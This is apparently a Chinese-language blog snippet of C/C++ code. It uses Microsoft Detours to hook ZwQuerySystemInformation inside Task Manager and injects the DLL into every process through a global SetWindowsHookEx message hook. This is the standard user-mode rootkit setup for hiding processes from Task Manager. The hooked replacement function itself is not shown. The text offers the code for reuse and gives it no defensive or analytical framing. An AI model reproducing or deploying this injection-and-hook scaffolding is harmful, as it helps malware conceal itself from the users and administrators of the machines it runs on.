还是和以前一样 Hook ZwQuerySystemInformation。用微软的Detour库,32位/64位都搞定。
LONG AttachDetours(VOID)
{
// 得到原函数地址
Real_ZwQuerySystemInformation = (pZwQuerySystemInformation)DetourFindFunction("ntdll.dll", "ZwQuerySystemInformation");
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)Real_ZwQuerySystemInformation, (PBYTE)Mine_ZwQuerySystemInformation);
return DetourTransactionCommit();
}
LONG DetachDetours(VOID)
{
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)Real_ZwQuerySystemInformation, (PBYTE)Mine_ZwQuerySystemInformation);
return DetourTransactionCommit();
}
//////////////////////////////////////////////////////////////////////////
BOOL APIENTRY DllMain(HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
if (0 == _tcscmp(szName, _T("TASKMGR.EXE"))) {
_Track(_T("inlineHook This Process %s"), szName);
//Inlink Hook
DetourRestoreAfterWith();
AttachDetours();
bHooked = TRUE;
}
}
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
{
//Unhook
if (bHooked)
{
DetachDetours();
}
}
break;
}
return TRUE;
}
LRESULT WINAPI MsgHookProc(int code, WPARAM wParam, LPARAM lParam)
{
return(CallNextHookEx(NULL, code, wParam, lParam));
}
BOOL Hook()
{
hHookMsg = SetWindowsHookEx(WH_GETMESSAGE, MsgHookProc, hInstDLL, 0);//0 mean hook all process
if (hHookMsg == NULL)
return FALSE;
return TRUE;
}
BOOL Unhook()
{
BOOL bRet = UnhookWindowsHookEx(hHookMsg);
hHookMsg = NULL;
return bRet;
}
